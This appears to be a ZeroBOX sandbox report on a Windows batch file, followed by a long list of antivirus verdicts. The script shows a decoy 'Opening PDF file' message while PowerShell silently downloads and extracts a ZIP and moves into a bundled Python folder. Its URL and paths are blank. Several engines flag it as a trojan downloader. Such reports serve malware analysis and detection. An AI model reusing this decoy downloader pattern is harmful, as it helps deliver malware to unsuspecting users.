Static | ZeroBOX
No static analysis available.
@echo off
echo Opening PDF file...
start "" ""
timeout /t 5 >nul REM Wait for PDF to open (adjust timeout as needed)
:: Variables
set "zipUrl="
set "destination=%USERPROFILE%\Downloads\"
set "extractTo=%USERPROFILE%\Downloads"
:: Use Invoke-WebRequest to download the file
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri '%zipUrl%' -OutFile '%destination%' }"
:: Extract the ZIP file using Expand-Archive
powershell -Command "& { Expand-Archive -Path '%destination%' -DestinationPath '%extractTo%' -Force }"
:: Navigate to the Python folder and run the script
cd /d "%Userprofile%\Downloads\qfv0ao\App\Python"
echo Opening PDF file...
start "" ""
timeout /t 5 >nul REM Wait for PDF to open (adjust timeout as needed)
:: End of script
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
MicroWorld-eScan Generic.BAT.PwshRunner.A.7615A3E7
CMC Clean
CAT-QuickHeal Clean
ALYac Generic.BAT.PwshRunner.A.7615A3E7
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Cynet Clean
Kaspersky Clean
BitDefender Generic.BAT.PwshRunner.A.7615A3E7
NANO-Antivirus Clean
ViRobot Clean
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Generic.BAT.PwshRunner.A.7615A3E7
TrendMicro Clean
FireEye Generic.BAT.PwshRunner.A.7615A3E7
Emsisoft Generic.BAT.PwshRunner.A.7615A3E7 (B)
Jiangmin Clean
Varist Clean
Avira Clean
MAX malware (ai score=86)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Generic.BAT.PwshRunner.A.7615A3E7
SUPERAntiSpyware Clean
ZoneAlarm Clean
GData Generic.BAT.PwshRunner.A.7615A3E7
Google Detected
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Trojan-Downloader.PowerShell.Agent
MaxSecure Clean
Fortinet Clean
Panda Clean
CrowdStrike Clean
alibabacloud Clean
No IRMA results available.